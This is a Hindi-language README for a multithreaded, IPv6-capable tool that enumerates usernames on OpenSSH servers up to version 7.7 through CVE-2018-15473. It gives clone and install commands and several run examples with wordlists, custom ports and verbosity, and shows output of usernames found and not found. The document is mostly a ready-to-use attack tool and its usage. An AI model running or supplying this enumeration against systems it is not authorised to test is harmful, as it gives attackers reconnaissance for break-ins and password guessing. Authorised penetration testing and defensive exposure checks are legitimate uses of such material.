
बहु-थ्रेडेड, IPv6-जागरूक, शब्दसूचियाँ/एकल-उपयोगकर्ता उपयोगकर्तानाम गणना CVE-2018-15473 के माध्यम से
OpenSSH 7.7 तक के संस्करण एक उपयोगकर्ता गणना भेद्यता के प्रति संवेदनशील है, क्योंकि यह किसी अमान्य प्रमाणीकरण करने वाले उपयोगकर्ता के लिए बेलआउट में देरी नहीं करता है जब तक कि अनुरोध वाले पैकेट को पूरी तरह से पार्स नहीं कर लिया जाता। यह auth2-gss.c, auth2-hostbased.c, और auth2-pubkey.c से संबंधित है।
आपको अपने डिस्ट्रो के समतुल्य openssl-dev पैकेज स्थापित करने की आवश्यकता हो सकती है
# नोट: यदि आप काली पर इंस्टॉल कर रहे हैं, तो आप pip install छोड़ सकते हैं; paramiko पहले से मौजूद है।
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - या -
pipenv install -r requirements.txt # यदि आप ऐसे कूल हैं
chmod u+x ssh-username-enum.py
एक एकल उपयोगकर्ता नाम
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi मिला!
10 थ्रेड के साथ एक वर्डलिस्ट का उपयोग करें (डिफ़ॉल्ट 4 है)
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi मिला!
[+] avahi-autoipd मिला!
[+] backup मिला!
[+] daemon मिला!
[+] bin मिला!
------8<------
पोर्ट 2222 पर IPv6 पता और बढ़ी हुई वर्बोसिटी!
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts नहीं मिला
[-] demo नहीं मिला
[-] checkfs नहीं मिला
[-] anon नहीं मिला
[-] EZsetup नहीं मिला
[-] auditor नहीं मिला
[-] demos नहीं मिला
[-] OutOfBox नहीं मिला
[-] checkfsys नहीं मिला
[+] avahi मिला!
[-] diag नहीं मिला
[-] ROOT नहीं मिला
[-] checksys नहीं मिला
[-] cmwlogin नहीं मिला
[+] avahi-autoipd मिला!
------8<------